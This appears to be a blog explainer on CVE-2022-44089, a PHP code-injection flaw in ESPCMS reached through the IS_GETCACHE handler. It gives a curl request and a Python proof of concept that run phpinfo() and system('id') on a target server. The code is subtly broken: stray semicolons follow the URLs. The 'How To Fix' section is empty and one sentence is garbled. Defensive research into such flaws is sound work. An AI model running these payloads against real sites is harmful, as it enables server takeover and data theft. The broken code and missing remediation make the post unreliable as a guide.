CVE-2022-44089 - Remote Code Execution in ESPCMS P8.21120101 via IS_GETCACHE — Deep Dive and Exploit Example

Date Posted: June 2024  
Author: Security Explainer

What Is CVE-2022-44089?

CVE-2022-44089 is a critical Remote Code Execution (RCE) vulnerability found in ESPCMS version P8.21120101. ESPCMS is a content management system popular in some Asian markets. This particular flaw lies in the IS_GETCACHE component — an endpoint meant for cache management, but which unknowingly opens the door to attackers.

In plain terms: By exploiting this weakness, a remote attacker can run code on your ESPCMS server. This could mean stealing your website's data, defacing your site, or even taking over your server.

Why Should You Care?

- Remote Code Execution: The holy grail for attackers. If you run ESPCMS P8.21120101 and you haven't patched this, you are wide open.

How The Vulnerability Works

Except for the vulnerable web server, no authentication is generally required. The bug is triggered by sending a specially crafted request to the IS_GETCACHE handler, which then processes user-supplied input insecurely. This input can be submitted via a parameter which is not properly sanitized, and ends up being evaluated as PHP code.

Original References

- CVE Mitre Entry (CVE-2022-44089)
- NVD Entry
- Exploit Proof-of-Concept (Github, Chinese)
- Exploit Database (if available)

Sample Exploit Request

Below is a simplified example using curl.

Suppose the vulnerable endpoint is at /index.php. An attacker might send

curl -G "http://target-site.com/index.php"; \
  --data-urlencode "ac=IS_GETCACHE" \
  --data-urlencode "name={phpinfo()}" 

In this example, if the input is passed unsanitized to eval(), this runs phpinfo() on the server and returns sensitive configuration data.

Here’s a more complex real-world proof-of-concept

import requests

TARGET = "http://target-site.com";
PATH = "/index.php"
payload = "system('id');"  # This will print the Linux user id

data = {
    "ac": "IS_GETCACHE",
    "name": "{" + payload + "}"
}

resp = requests.post(TARGET + PATH, data=data)
print(resp.text)

If the exploit is successful, the server will return the result of id, such as uid=33(www-data) in the HTTP response.


## How To Fix / Protect

Final Thoughts

CVE-2022-44089 is a harsh reminder that improper input handling, especially in CMS components, can have devastating consequences. The ESPCMS flaw is particularly dangerous due to its trivially exploitable nature.

If you use ESPCMS P8.21120101, patch immediately.  
Don’t let your site become another statistic in someone’s list of pwned servers!

Further Reading

- ESPCMS Official Site
- Common PHP Security Pitfalls

Disclaimer:  
This post is for educational and defensive research purposes only. Do not test on servers you do not own.

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/15/2022 19:53:00 UTC